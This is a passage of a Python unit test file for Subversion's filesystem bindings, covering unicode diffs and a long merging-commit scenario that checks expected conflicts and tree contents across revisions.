def svn_test__create_greek_tree_at(txn_root, root_dir):
for node in greek_tree_nodes:
path = core.svn_relpath_join(root_dir, node.path)
if node.contents is not None:
fs.make_file(txn_root, path)
svn_test__set_file_contents(txn_root, path, node.contents)
else:
fs.make_dir(txn_root, path)
return
def svn_test__create_greek_tree(txn_root):
return svn_test__create_greek_tree_at(txn_root, "")
class SubversionFSTestCase(unittest.TestCase):
"""Test cases for the Subversion FS layer"""
def log_message_func(self, items, pool):
""" Simple log message provider for unit tests. """
return b"Test unicode log message"
def setUp(self):
"""Load a Subversion repository"""
self.temper = utils.Temper()
(self.repos, self.repos_path, self.repos_uri) = self.temper.alloc_known_repo(
'trac/versioncontrol/tests/svnrepos.dump', suffix='-repository')
self.fs = repos.fs(self.repos)
self.rev = fs.youngest_rev(self.fs)
self.tmpfile = None
self.unistr = u'⊙_ʘ'
tmpfd, self.tmpfile = mkstemp()
tmpfp = os.fdopen(tmpfd, "wb")
# Use a unicode file to ensure proper non-ascii handling.
tmpfp.write(self.unistr.encode('utf8'))
tmpfp.close()
clientctx = client.svn_client_create_context()
clientctx.log_msg_func3 = client.svn_swig_py_get_commit_log_func
clientctx.log_msg_baton3 = self.log_message_func
providers = [
client.svn_client_get_simple_provider(),
client.svn_client_get_username_provider(),
]
clientctx.auth_baton = core.svn_auth_open(providers)
if isinstance(self.tmpfile, bytes):
tmpfile_bytes = self.tmpfile
else:
tmpfile_bytes = self.tmpfile.encode('UTF-8')
commitinfo = client.import2(tmpfile_bytes,
urljoin(self.repos_uri + b"/",b"trunk/UniTest.txt"),
True, True,
clientctx)
self.commitedrev = commitinfo.revision
def tearDown(self):
self.fs = None
self.repos = None
self.temper.cleanup()
if self.tmpfile is not None:
os.remove(self.tmpfile)
def test_diff_repos_paths_internal(self):
"""Test diffing of a repository path using the internal diff."""
# Test standard internal diff
fdiff = fs.FileDiff(fs.revision_root(self.fs, self.commitedrev), b"/trunk/UniTest.txt",
None, None, diffoptions=None)
diffp = fdiff.get_pipe()
diffoutput = diffp.read().decode('utf8')
diffp.close()
self.assertTrue(diffoutput.find(u'-' + self.unistr) > 0)
def test_diff_repos_paths_external(self):
"""Test diffing of a repository path using an external diff (if available)."""
# Test if this environment has the diff command, if not then skip the test
try:
diffout, differr = Popen(["diff"], stdin=PIPE, stderr=PIPE).communicate()
except OSError as err:
if err.errno == errno.ENOENT:
self.skipTest("'diff' command not present")
else:
raise err
fdiff = fs.FileDiff(fs.revision_root(self.fs, self.commitedrev), b"/trunk/UniTest.txt",
None, None, diffoptions=[])
diffp = fdiff.get_pipe()
diffoutput = diffp.read().decode('utf8')
diffp.close()
self.assertTrue(diffoutput.find(u'< ' + self.unistr) > 0)
# Helper: commit TXN, expecting either success or failure:
#
  # If EXPECTED_CONFLICT is None, then the commit is expected to
  # succeed.  If it does succeed, set *NEW_REV to the new revision;
  # otherwise, raise an error.
  #
  # If EXPECTED_CONFLICT is not None, it is either the empty string or
  # the expected path of the conflict.  If it is the empty string, any
  # conflict is acceptable.  If it is a non-empty string, the commit
  # must fail due to conflict, and the conflict path must match
  # EXPECTED_CONFLICT.  If they don't match, raise an AssertionError.
  #
  # If a conflict is expected but the commit succeeds anyway, raise an
  # AssertionError.  If the commit fails but does not provide an error,
  # raise an AssertionError.
#
# This function was taken from test_commit_txn() in
# subversion/tests/libsvn_fs/fs-test.c but renamed to avoid confusion.
#
def check_commit_txn(self, txn, expected_conflict, pool=None):
if (isinstance(expected_conflict, bytes)
and not isinstance(expected_conflict, str)):
expected_conflict = expected_conflict.decode('utf-8')
new_rev = None
conflict = None
try:
conflict, new_rev = fs.commit_txn(txn, pool)
except core.SubversionException as e:
self.assertTrue(hasattr(e, 'conflict_p'))
conflict = e.conflict_p
if isinstance(conflict, bytes) and not isinstance(conflict, str):
conflict = conflict.decode('utf-8')
self.assertTrue(hasattr(e, 'new_rev'))
new_rev = e.new_rev
if e.apr_err == core.SVN_ERR_FS_CONFLICT:
self.assertIsNotNone(expected_conflict,
"commit conflicted at '%s', but no conflict expected"
% conflict if conflict else '(missing conflict info!)')
self.assertIsNotNone(conflict,
"commit conflicted as expected, "
"but no conflict path was returned ('%s' expected)"
% expected_conflict)
if expected_conflict:
self.assertEqual(conflict, expected_conflict,
"commit conflicted at '%s', but expected conflict at '%s'"
% (conflict, expected_conflict))
# The svn_fs_commit_txn() API promises to set *NEW_REV to an
# invalid revision number in the case of a conflict.
self.assertEqual(new_rev, core.SVN_INVALID_REVNUM,
"conflicting commit returned valid new revision")
else:
# commit may have succeeded, but always report an error
if new_rev != core.SVN_INVALID_REVNUM:
raise core.SubversionException(
"commit succeeded but something else failed",
e.apr_err, e)
else:
raise core.SubversionException(
"commit failed due to something other than conflict",
e.apr_err, e)
else:
# commit should have succeeded
self.assertNotEqual(new_rev, core.SVN_INVALID_REVNUM,
"commit failed but no error was returned")
self.assertIsNone(expected_conflict,
"commit succeeded that was expected to fail at '%s'"
% expected_conflict)
return new_rev
def test_basic_commit(self):
"""Test committing against an empty repository."""
# Prepare a filesystem
handle, repo_path, rep_uri = self.temper.alloc_empty_repo(
"-test-repo-basic-commit")
test_fs = repos.fs(handle)
# Save the current youngest revision.
before_rev = fs.youngest_rev(test_fs)
    # Prepare a txn to receive the greek tree.
    txn = fs.begin_txn2(test_fs, 0, 0)
txn_root = fs.txn_root(txn)
# Paranoidly check that the current youngest rev is unchanged.
after_rev = fs.youngest_rev(test_fs)
self.assertEqual(before_rev, after_rev,
'youngest revision changed unexpectedly')
# Create the greek tree
svn_test__create_greek_tree(txn_root)
self.assertTrue(fs.is_txn_root(txn_root))
self.assertFalse(fs.is_revision_root(txn_root))
# Commit it.
_, after_rev = fs.commit_txn(txn)
self.assertNotEqual(after_rev, core.SVN_INVALID_REVNUM)
# Make sure it's a different revision than before.
self.assertNotEqual(after_rev, before_rev,
"youngest revision failed to change")
# Get root of the revision
revision_root = fs.revision_root(test_fs, after_rev)
self.assertFalse(fs.is_txn_root(revision_root))
self.assertTrue(fs.is_revision_root(revision_root))
# Check the tree.
svn_test__check_greek_tree(revision_root)
def test_merging_commit(self):
"""Commit with merging (committing against non-youngest)."""
# Python implementation of fs-test.c: merging_commit()
# Prepare a filesystem
handle, repo_path, rep_uri = self.temper.alloc_empty_repo(
"-test-repo-merging-commit")
test_fs = repos.fs(handle)
# initialize our revision number stuffs.
revisions = [core.SVN_INVALID_REVNUM] * 24
revision_count = 0
revisions[revision_count] = 0
revision_count += 1
########################################################################
# REVISION 0
########################################################################
# In one txn, create and commit the greek tree.
txn = fs.begin_txn2(test_fs, 0, 0)
txn_root = fs.txn_root(txn)
svn_test__create_greek_tree(txn_root)
after_rev = self.check_commit_txn(txn, None)
########################################################################
# REVISION 1
########################################################################
expected_entries = [
# path, contents (None = dir)
SubversionTestTreeEntry("iota", "This is the file 'iota'.\n"),
SubversionTestTreeEntry("A" , None),
SubversionTestTreeEntry("A/mu", "This is the file 'mu'.\n"),
SubversionTestTreeEntry("A/B", None),
SubversionTestTreeEntry("A/B/lambda", "This is the file 'lambda'.\n"),
SubversionTestTreeEntry("A/B/E", None),
SubversionTestTreeEntry("A/B/E/alpha", "This is the file 'alpha'.\n"),
SubversionTestTreeEntry("A/B/E/beta", "This is the file 'beta'.\n"),
SubversionTestTreeEntry("A/B/F", None),
SubversionTestTreeEntry("A/C", None),
SubversionTestTreeEntry("A/D", None),
SubversionTestTreeEntry("A/D/gamma", "This is the file 'gamma'.\n"),
SubversionTestTreeEntry("A/D/G", None),
SubversionTestTreeEntry("A/D/G/pi", "This is the file 'pi'.\n"),
SubversionTestTreeEntry("A/D/G/rho", "This is the file 'rho'.\n"),
SubversionTestTreeEntry("A/D/G/tau", "This is the file 'tau'.\n"),
SubversionTestTreeEntry("A/D/H", None),
SubversionTestTreeEntry("A/D/H/chi", "This is the file 'chi'.\n"),
SubversionTestTreeEntry("A/D/H/psi", "This is the file 'psi'.\n"),
SubversionTestTreeEntry("A/D/H/omega", "This is the file 'omega'.\n")]
revision_root = fs.revision_root(test_fs, after_rev)
svn_test__validate_tree(revision_root, expected_entries)
revisions[revision_count] = after_rev
revision_count += 1
# Let's add a directory and some files to the tree, and delete 'iota'
txn = fs.begin_txn2(test_fs, revisions[revision_count-1], 0)
txn_root = fs.txn_root(txn)
fs.make_dir(txn_root, "A/D/I")
fs.make_file(txn_root, "A/D/I/delta")
svn_test__set_file_contents(txn_root, "A/D/I/delta",
"This is the file 'delta'.\n")
fs.make_file(txn_root, "A/D/I/epsilon")
svn_test__set_file_contents(txn_root, "A/D/I/epsilon",
"This is the file 'epsilon'.\n")
fs.make_file(txn_root, "A/C/kappa")
svn_test__set_file_contents(txn_root, "A/C/kappa",
"This is the file 'kappa'.\n")
fs.delete(txn_root, "iota")
after_rev = self.check_commit_txn(txn, None)
########################################################################
# REVISION 2
########################################################################
expected_entries = [
# path, contents (None = dir)
SubversionTestTreeEntry("A", None),
SubversionTestTreeEntry("A/mu", "This is the file 'mu'.\n"),
SubversionTestTreeEntry("A/B", None),
SubversionTestTreeEntry("A/B/lambda",
"This is the file 'lambda'.\n"),
SubversionTestTreeEntry("A/B/E", None),
SubversionTestTreeEntry("A/B/E/alpha",
"This is the file 'alpha'.\n"),
SubversionTestTreeEntry("A/B/E/beta",
"This is the file 'beta'.\n"),
SubversionTestTreeEntry("A/B/F", None),
SubversionTestTreeEntry("A/C", None),
SubversionTestTreeEntry("A/C/kappa",
"This is the file 'kappa'.\n"),
SubversionTestTreeEntry("A/D", None),
SubversionTestTreeEntry("A/D/gamma",
"This is the file 'gamma'.\n"),
SubversionTestTreeEntry("A/D/G", None),
SubversionTestTreeEntry("A/D/G/pi",
"This is the file 'pi'.\n"),
SubversionTestTreeEntry("A/D/G/rho",
"This is the file 'rho'.\n"),
SubversionTestTreeEntry("A/D/G/tau",
"This is the file 'tau'.\n"),
SubversionTestTreeEntry("A/D/H", None),
SubversionTestTreeEntry("A/D/H/chi",
"This is the file 'chi'.\n"),
SubversionTestTreeEntry("A/D/H/psi",
"This is the file 'psi'.\n"),
SubversionTestTreeEntry("A/D/H/omega",
"This is the file 'omega'.\n"),
SubversionTestTreeEntry("A/D/I", None),
SubversionTestTreeEntry("A/D/I/delta",
"This is the file 'delta'.\n"),
SubversionTestTreeEntry("A/D/I/epsilon",
"This is the file 'epsilon'.\n")]
revision_root = fs.revision_root(test_fs, after_rev)
svn_test__validate_tree(revision_root, expected_entries)
revisions[revision_count] = after_rev
revision_count += 1
# We don't think the A/D/H directory is pulling its weight...let's
# knock it off. Oh, and let's re-add iota, too.
txn = fs.begin_txn2(test_fs, revisions[revision_count-1], 0)
txn_root = fs.txn_root(txn)
fs.delete(txn_root, "A/D/H")
fs.make_file(txn_root, "iota")
svn_test__set_file_contents(txn_root, "iota",
"This is the new file 'iota'.\n")
after_rev = self.check_commit_txn(txn, None)
########################################################################
# REVISION 3
########################################################################
expected_entries = [
# path, contents (None = dir)
SubversionTestTreeEntry("iota",
"This is the new file 'iota'.\n"),
SubversionTestTreeEntry("A", None),
SubversionTestTreeEntry("A/mu",
"This is the file 'mu'.\n"),
SubversionTestTreeEntry("A/B", None),
SubversionTestTreeEntry("A/B/lambda",
"This is the file 'lambda'.\n"),
SubversionTestTreeEntry("A/B/E", None),
SubversionTestTreeEntry("A/B/E/alpha",
"This is the file 'alpha'.\n"),
SubversionTestTreeEntry("A/B/E/beta",
"This is the file 'beta'.\n"),
SubversionTestTreeEntry("A/B/F", None),
SubversionTestTreeEntry("A/C", None),
SubversionTestTreeEntry("A/C/kappa",
"This is the file 'kappa'.\n"),
SubversionTestTreeEntry("A/D", None),
SubversionTestTreeEntry("A/D/gamma",
"This is the file 'gamma'.\n"),
SubversionTestTreeEntry("A/D/G", None),
SubversionTestTreeEntry("A/D/G/pi",
"This is the file 'pi'.\n"),
SubversionTestTreeEntry("A/D/G/rho",
"This is the file 'rho'.\n"),
SubversionTestTreeEntry("A/D/G/tau",
"This is the file 'tau'.\n"),
SubversionTestTreeEntry("A/D/I", None),
SubversionTestTreeEntry("A/D/I/delta",
"This is the file 'delta'.\n"),
SubversionTestTreeEntry("A/D/I/epsilon",
"This is the file 'epsilon'.\n")]
revision_root = fs.revision_root(test_fs, after_rev)
svn_test__validate_tree(revision_root, expected_entries)
revisions[revision_count] = after_rev
revision_count += 1
# Delete iota (yet again).
txn = fs.begin_txn2(test_fs, revisions[revision_count-1], 0)
txn_root = fs.txn_root(txn)
fs.delete(txn_root, "iota")
after_rev = self.check_commit_txn(txn, None)
########################################################################
# REVISION 4
########################################################################
expected_entries = [
# path, contents (None = dir)
SubversionTestTreeEntry("A", None),
SubversionTestTreeEntry("A/mu",
"This is the file 'mu'.\n"),
SubversionTestTreeEntry("A/B", None),
SubversionTestTreeEntry("A/B/lambda",
"This is the file 'lambda'.\n"),
SubversionTestTreeEntry("A/B/E", None),
SubversionTestTreeEntry("A/B/E/alpha",
"This is the file 'alpha'.\n"),
SubversionTestTreeEntry("A/B/E/beta",
"This is the file 'beta'.\n"),
SubversionTestTreeEntry("A/B/F", None),
SubversionTestTreeEntry("A/C", None),
SubversionTestTreeEntry("A/C/kappa",
"This is the file 'kappa'.\n"),
SubversionTestTreeEntry("A/D", None),
SubversionTestTreeEntry("A/D/gamma",
"This is the file 'gamma'.\n"),
SubversionTestTreeEntry("A/D/G", None),
SubversionTestTreeEntry("A/D/G/pi",
"This is the file 'pi'.\n"),
SubversionTestTreeEntry("A/D/G/rho",
"This is the file 'rho'.\n"),
SubversionTestTreeEntry("A/D/G/tau",
"This is the file 'tau'.\n"),
SubversionTestTreeEntry("A/D/I", None),
SubversionTestTreeEntry("A/D/I/delta",
"This is the file 'delta'.\n"),
SubversionTestTreeEntry("A/D/I/epsilon",
"This is the file 'epsilon'.\n")]
revision_root = fs.revision_root(test_fs, after_rev)
svn_test__validate_tree(revision_root, expected_entries)
revisions[revision_count] = after_rev
revision_count += 1
########################################################################
    # GIVEN: A and B, with common ancestor ANCESTOR, where A and B are
    # directories, and E, an entry in either A, B, or ANCESTOR.
#
# For every E, the following cases exist:
# - E exists in neither ANCESTOR nor A.
# - E doesn't exist in ANCESTOR, and has been added to A.
# - E exists in ANCESTOR, but has been deleted from A.
# - E exists in both ANCESTOR and A ...
# - but refers to different node revisions.
# - and refers to the same node revision.
#
# The same set of possible relationships with ANCESTOR holds for B,
# so there are thirty-six combinations. The matrix is symmetrical
# with A and B reversed, so we only have to describe one triangular
# half, including the diagonal --- 21 combinations.
#
# Our goal here is to test all the possible scenarios that can
# occur given the above boolean logic table, and to make sure that
# the results we get are as expected.
#
# The test cases below have the following features:
#
# - They run straight through the scenarios as described in the
# `structure' document at this time.
#
# - In each case, a txn is begun based on some revision (ANCESTOR),
# is modified into a new tree (B), and then is attempted to be
# committed (which happens against the head of the tree, A).
#
# - If the commit is successful (and is *expected* to be such),
# that new revision (which exists now as a result of the
# successful commit) is thoroughly tested for accuracy of tree
# entries, and in the case of files, for their contents. It is
# important to realize that these successful commits are
    # advancing the head of the tree, and each one effectively becomes
# the new `A' described in further test cases.
#
########################################################################
# (6) E exists in neither ANCESTOR nor A.
# (1) E exists in neither ANCESTOR nor B. Can't occur, by
# assumption that E exists in either A, B, or ancestor.
# (1) E has been added to B. Add E in the merged result.
txn = fs.begin_txn2(test_fs, revisions[0], 0)
txn_root = fs.txn_root(txn)
fs.make_file(txn_root, "theta")
svn_test__set_file_contents(txn_root, "theta",
"This is the file 'theta'.\n")
after_rev = self.check_commit_txn(txn, None)
########################################################################
# REVISION 5
########################################################################
expected_entries = [
# path, contents (None = dir)
SubversionTestTreeEntry("theta",
"This is the file 'theta'.\n"),
SubversionTestTreeEntry("A", None),
SubversionTestTreeEntry("A/mu",
"This is the file 'mu'.\n"),
SubversionTestTreeEntry("A/B", None),
SubversionTestTreeEntry("A/B/lambda",
"This is the file 'lambda'.\n"),
SubversionTestTreeEntry("A/B/E", None),
SubversionTestTreeEntry("A/B/E/alpha",
"This is the file 'alpha'.\n"),
SubversionTestTreeEntry("A/B/E/beta",
"This is the file 'beta'.\n"),
SubversionTestTreeEntry("A/B/F", None),
SubversionTestTreeEntry("A/C", None),
SubversionTestTreeEntry("A/C/kappa",
"This is the file 'kappa'.\n"),
SubversionTestTreeEntry("A/D", None),
SubversionTestTreeEntry("A/D/gamma",
"This is the file 'gamma'.\n"),
SubversionTestTreeEntry("A/D/G", None),
SubversionTestTreeEntry("A/D/G/pi",
"This is the file 'pi'.\n"),
SubversionTestTreeEntry("A/D/G/rho",
"This is the file 'rho'.\n"),
SubversionTestTreeEntry("A/D/G/tau",
"This is the file 'tau'.\n"),
SubversionTestTreeEntry("A/D/I", None),
SubversionTestTreeEntry("A/D/I/delta",
"This is the file 'delta'.\n"),
SubversionTestTreeEntry("A/D/I/epsilon",
"This is the file 'epsilon'.\n")]
revision_root = fs.revision_root(test_fs, after_rev)
svn_test__validate_tree(revision_root, expected_entries)
revisions[revision_count] = after_rev
revision_count += 1
# (1) E has been deleted from B. Can't occur, by assumption that
# E doesn't exist in ANCESTOR.
# (3) E exists in both ANCESTOR and B. Can't occur, by
# assumption that E doesn't exist in ancestor.
# (5) E doesn't exist in ANCESTOR, and has been added to A.
# (1) E doesn't exist in ANCESTOR, and has been added to B.
txn = fs.begin_txn2(test_fs, revisions[4], 0)
txn_root = fs.txn_root(txn)
fs.make_file(txn_root, "theta")
svn_test__set_file_contents(txn_root, "theta",
"This is another file 'theta'.\n")
# TXN must actually be based upon revisions[4] (instead of HEAD).
self.assertEqual(fs.txn_base_revision(txn), revisions[4])
failed_rev = self.check_commit_txn(txn, "/theta")
fs.abort_txn(txn)
# (1) E exists in ANCESTOR, but has been deleted from B. Can't
# occur, by assumption that E doesn't exist in ANCESTOR.
# (3) E exists in both ANCESTOR and B. Can't occur, by assumption
# that E doesn't exist in ANCESTOR.
self.assertEqual(failed_rev, core.SVN_INVALID_REVNUM)
# (4) E exists in ANCESTOR, but has been deleted from A
# (1) E exists in ANCESTOR, but has been deleted from B. If
# neither delete was a result of a rename, then omit E from the
# merged tree. Otherwise, conflict.
# ### cmpilato todo: the rename case isn't actually handled by
# merge yet, so we know we won't get a conflict here.
txn = fs.begin_txn2(test_fs, revisions[1], 0)
txn_root = fs.txn_root(txn)
fs.delete(txn_root, "A/D/H")
# TXN must actually be based upon revisions[1] (instead of HEAD).
self.assertEqual(fs.txn_base_revision(txn), revisions[1])
# We used to create the revision like this before fixing issue
# #2751 -- Directory prop mods reverted in overlapping commits scenario.
#
# But we now expect that to fail as out of date
failed_rev = self.check_commit_txn(txn, "/A/D/H")
self.assertEqual(failed_rev, core.SVN_INVALID_REVNUM)
########################################################################
# REVISION 6
########################################################################
expected_entries = [
# path, contents (None = dir)
SubversionTestTreeEntry("theta",
"This is the file 'theta'.\n"),
SubversionTestTreeEntry("A", None),
SubversionTestTreeEntry("A/mu",
"This is the file 'mu'.\n"),
SubversionTestTreeEntry("A/B", None),
SubversionTestTreeEntry("A/B/lambda",
"This is the file 'lambda'.\n"),
SubversionTestTreeEntry("A/B/E", None),
SubversionTestTreeEntry("A/B/E/alpha",
"This is the file 'alpha'.\n"),
SubversionTestTreeEntry("A/B/E/beta",
"This is the file 'beta'.\n"),
SubversionTestTreeEntry("A/B/F", None),
SubversionTestTreeEntry("A/C", None),
SubversionTestTreeEntry("A/C/kappa",
"This is the file 'kappa'.\n"),
SubversionTestTreeEntry("A/D", None),
SubversionTestTreeEntry("A/D/gamma",
"This is the file 'gamma'.\n"),
SubversionTestTreeEntry("A/D/G", None),
SubversionTestTreeEntry("A/D/G/pi",
"This is the file 'pi'.\n"),
SubversionTestTreeEntry("A/D/G/rho",
"This is the file 'rho'.\n"),
SubversionTestTreeEntry("A/D/G/tau",
"This is the file 'tau'.\n"),
SubversionTestTreeEntry("A/D/I", None),
SubversionTestTreeEntry("A/D/I/delta",
"This is the file 'delta'.\n"),
SubversionTestTreeEntry("A/D/I/epsilon",
"This is the file 'epsilon'.\n")]
revision_root = fs.revision_root(test_fs, after_rev)
svn_test__validate_tree(revision_root, expected_entries)
revisions[revision_count] = after_rev
revision_count += 1
# Try deleting a file F inside a subtree S where S does not exist
# in the most recent revision, but does exist in the ancestor
# tree. This should conflict.
txn = fs.begin_txn2(test_fs, revisions[1], 0)
txn_root = fs.txn_root(txn)
fs.delete(txn_root, "A/D/H/omega")
failed_rev = self.check_commit_txn(txn, "/A/D/H")
fs.abort_txn(txn)
self.assertEqual(failed_rev, core.SVN_INVALID_REVNUM)
# E exists in both ANCESTOR and B ...
# (1) but refers to different nodes. Conflict.
txn = fs.begin_txn2(test_fs, after_rev, 0)
txn_root = fs.txn_root(txn)
fs.make_dir(txn_root, "A/D/H")
after_rev = self.check_commit_txn(txn, None)
revisions[revision_count] = after_rev
revision_count += 1
########################################################################
# REVISION 7
########################################################################
# Re-remove A/D/H because future tests expect it to be absent.
txn = fs.begin_txn2(test_fs, revisions[revision_count - 1], 0)
txn_root = fs.txn_root(txn)
fs.delete(txn_root, "A/D/H")
after_rev = self.check_commit_txn(txn, None)
revisions[revision_count] = after_rev
revision_count += 1
########################################################################
# REVISION 8 (looks exactly like revision 6, we hope)
########################################################################
# (1) but refers to different revisions of the same node.
# Conflict.
txn = fs.begin_txn2(test_fs, revisions[1], 0)
txn_root = fs.txn_root(txn)
fs.make_file(txn_root, "A/D/H/zeta")
after_rev = self.check_commit_txn(txn, "/A/D/H")
fs.abort_txn(txn)
# (1) and refers to the same node revision. Omit E from the
# merged tree. This is already tested in Merge-Test 3
# (A/D/H/chi, A/D/H/psi, e.g.), but we'll test it here again
# anyway. A little paranoia never hurt anyone.
txn = fs.begin_txn2(test_fs, revisions[1], 0)
txn_root = fs.txn_root(txn)
fs.delete(txn_root, "A/mu") # unrelated change
after_rev = self.check_commit_txn(txn, None)
########################################################################
# REVISION 9
########################################################################
expected_entries = [
# path, contents (None = dir)
SubversionTestTreeEntry("theta",
"This is the file 'theta'.\n"),
SubversionTestTreeEntry("A", None),
SubversionTestTreeEntry("A/B", None),
SubversionTestTreeEntry("A/B/lambda",
"This is the file 'lambda'.\n"),
SubversionTestTreeEntry("A/B/E", None),
SubversionTestTreeEntry("A/B/E/alpha",
"This is the file 'alpha'.\n"),
SubversionTestTreeEntry("A/B/E/beta",
"This is the file 'beta'.\n"),
SubversionTestTreeEntry("A/B/F", None),
SubversionTestTreeEntry("A/C", None),
SubversionTestTreeEntry("A/C/kappa",
"This is the file 'kappa'.\n"),
SubversionTestTreeEntry("A/D", None),
SubversionTestTreeEntry("A/D/gamma",
"This is the file 'gamma'.\n"),
SubversionTestTreeEntry("A/D/G", None),
SubversionTestTreeEntry("A/D/G/pi",
"This is the file 'pi'.\n"),
SubversionTestTreeEntry("A/D/G/rho",
"This is the file 'rho'.\n"),
SubversionTestTreeEntry("A/D/G/tau",
"This is the file 'tau'.\n"),
SubversionTestTreeEntry("A/D/I", None),
SubversionTestTreeEntry("A/D/I/delta",
"This is the file 'delta'.\n"),
SubversionTestTreeEntry("A/D/I/epsilon",
"This is the file 'epsilon'.\n")]
revision_root = fs.revision_root(test_fs, after_rev)
svn_test__validate_tree(revision_root, expected_entries)
revisions[revision_count] = after_rev
revision_count += 1
# Preparation for upcoming tests.
# We make a new head revision, with A/mu restored, but containing
# slightly different contents than its first incarnation.
txn = fs.begin_txn2(test_fs, revisions[revision_count - 1], 0)
txn_root = fs.txn_root(txn)
fs.make_file(txn_root, "A/mu")
svn_test__set_file_contents(txn_root, "A/mu",
"A new file 'mu'.\n")
fs.make_file(txn_root, "A/D/G/xi")
svn_test__set_file_contents(txn_root, "A/D/G/xi",
"This is the file 'xi'.\n")
after_rev = self.check_commit_txn(txn, None)
########################################################################
# REVISION 10
########################################################################
expected_entries = [
# path, contents (None = dir)
SubversionTestTreeEntry("theta",
"This is the file 'theta'.\n"),
SubversionTestTreeEntry("A", None),
SubversionTestTreeEntry("A/mu",
"A new file 'mu'.\n"),
SubversionTestTreeEntry("A/B", None),
SubversionTestTreeEntry("A/B/lambda",
"This is the file 'lambda'.\n"),
SubversionTestTreeEntry("A/B/E", None),
SubversionTestTreeEntry("A/B/E/alpha",
"This is the file 'alpha'.\n"),
SubversionTestTreeEntry("A/B/E/beta",
"This is the file 'beta'.\n"),
SubversionTestTreeEntry("A/B/F", None),
SubversionTestTreeEntry("A/C", None),
SubversionTestTreeEntry("A/C/kappa",
"This is the file 'kappa'.\n"),
SubversionTestTreeEntry("A/D", None),
SubversionTestTreeEntry("A/D/gamma",
"This is the file 'gamma'.\n"),
SubversionTestTreeEntry("A/D/G", None),
SubversionTestTreeEntry("A/D/G/pi",
"This is the file 'pi'.\n"),
SubversionTestTreeEntry("A/D/G/rho",
"This is the file 'rho'.\n"),
SubversionTestTreeEntry("A/D/G/tau",
"This is the file 'tau'.\n"),
SubversionTestTreeEntry("A/D/G/xi",
"This is the file 'xi'.\n"),
SubversionTestTreeEntry("A/D/I", None),
SubversionTestTreeEntry("A/D/I/delta",
"This is the file 'delta'.\n"),
SubversionTestTreeEntry("A/D/I/epsilon",
"This is the file 'epsilon'.\n")]
revision_root = fs.revision_root(test_fs, after_rev)
svn_test__validate_tree(revision_root, expected_entries)
revisions[revision_count] = after_rev
revision_count += 1
# (3) E exists in both ANCESTOR and A, but refers to different
# nodes.
#
# (1) E exists in both ANCESTOR and B, but refers to different
# nodes, and not all nodes are directories. Conflict.
# ### kff todo: A/mu's contents will be exactly the same.
# If the fs ever starts optimizing this case, these tests may
# start to fail.
txn = fs.begin_txn2(test_fs, revisions[1], 0)
txn_root = fs.txn_root(txn)
fs.delete(txn_root, "A/mu")
fs.make_file(txn_root, "A/mu")
svn_test__set_file_contents(txn_root, "A/mu",
"This is the file 'mu'.\n")
after_rev = self.check_commit_txn(txn, "/A/mu")
fs.abort_txn(txn)
# (1) E exists in both ANCESTOR and B, but refers to different
# revisions of the same node. Conflict.
txn = fs.begin_txn2(test_fs, revisions[1], 0)
txn_root = fs.txn_root(txn)
svn_test__set_file_contents(txn_root, "A/mu",
"A change to file 'mu'.\n")
after_rev = self.check_commit_txn(txn, "/A/mu")
fs.abort_txn(txn)
# (1) E exists in both ANCESTOR and B, and refers to the same
# node revision. Replace E with A's node revision.
txn = fs.begin_txn2(test_fs, revisions[1], 0)
txn_root = fs.txn_root(txn)
old_mu_contents = svn_test__get_file_contents(txn_root, "A/mu")
if (not isinstance(old_mu_contents, str)
or old_mu_contents != "This is the file 'mu'.\n"):
raise core.SubversionException(
"got wrong contents from an old revision tree",
core.SVN_ERR_FS_GENERAL)
fs.make_file(txn_root, "A/sigma") # unrelated change
svn_test__set_file_contents(txn_root, "A/sigma",
"This is the file 'sigma'.\n")
after_rev = self.check_commit_txn(txn, None)
########################################################################
# REVISION 11
########################################################################
expected_entries = [
# path, contents (None = dir)
SubversionTestTreeEntry("theta",
"This is the file 'theta'.\n"),
SubversionTestTreeEntry("A", None),
SubversionTestTreeEntry("A/mu",
"A new file 'mu'.\n"),
SubversionTestTreeEntry("A/sigma",
"This is the file 'sigma'.\n"),
SubversionTestTreeEntry("A/B", None),
SubversionTestTreeEntry("A/B/lambda",
"This is the file 'lambda'.\n"),
SubversionTestTreeEntry("A/B/E", None),
SubversionTestTreeEntry("A/B/E/alpha",
"This is the file 'alpha'.\n"),
SubversionTestTreeEntry("A/B/E/beta",
"This is the file 'beta'.\n"),
SubversionTestTreeEntry("A/B/F", None),
SubversionTestTreeEntry("A/C", None),
SubversionTestTreeEntry("A/C/kappa",
"This is the file 'kappa'.\n"),
SubversionTestTreeEntry("A/D", None),
SubversionTestTreeEntry("A/D/gamma",
"This is the file 'gamma'.\n"),
SubversionTestTreeEntry("A/D/G", None),
SubversionTestTreeEntry("A/D/G/pi",
"This is the file 'pi'.\n"),
SubversionTestTreeEntry("A/D/G/rho",
"This is the file 'rho'.\n"),
SubversionTestTreeEntry("A/D/G/tau",
"This is the file 'tau'.\n"),
SubversionTestTreeEntry("A/D/G/xi",
"This is the file 'xi'.\n"),
SubversionTestTreeEntry("A/D/I", None),
SubversionTestTreeEntry("A/D/I/delta",
"This is the file 'delta'.\n"),
SubversionTestTreeEntry("A/D/I/epsilon",
"This is the file 'epsilon'.\n")]
revision_root = fs.revision_root(test_fs, after_rev)
svn_test__validate_tree(revision_root, expected_entries)
revisions[revision_count] = after_rev
revision_count += 1
# Preparation for upcoming tests.
# We make a new head revision. There are two changes in the new
# revision: A/B/lambda has been modified. We will also use the
# recent addition of A/D/G/xi, treated as a modification to
# A/D/G.
txn = fs.begin_txn2(test_fs, revisions[revision_count - 1], 0)
txn_root = fs.txn_root(txn)
svn_test__set_file_contents(txn_root, "A/B/lambda",
"Change to file 'lambda'.\n")
after_rev = self.check_commit_txn(txn, None)
########################################################################
# REVISION 12
########################################################################
expected_entries = [
# path, contents (None = dir)
SubversionTestTreeEntry("theta",
"This is the file 'theta'.\n"),
SubversionTestTreeEntry("A", None),
SubversionTestTreeEntry("A/mu",
"A new file 'mu'.\n"),
SubversionTestTreeEntry("A/sigma",
"This is the file 'sigma'.\n"),
SubversionTestTreeEntry("A/B", None),
SubversionTestTreeEntry("A/B/lambda",
"Change to file 'lambda'.\n"),
SubversionTestTreeEntry("A/B/E", None),
SubversionTestTreeEntry("A/B/E/alpha",
"This is the file 'alpha'.\n"),
SubversionTestTreeEntry("A/B/E/beta",
"This is the file 'beta'.\n"),
SubversionTestTreeEntry("A/B/F", None),
SubversionTestTreeEntry("A/C", None),
SubversionTestTreeEntry("A/C/kappa",
"This is the file 'kappa'.\n"),
SubversionTestTreeEntry("A/D", None),
SubversionTestTreeEntry("A/D/gamma",
"This is the file 'gamma'.\n"),
SubversionTestTreeEntry("A/D/G", None),
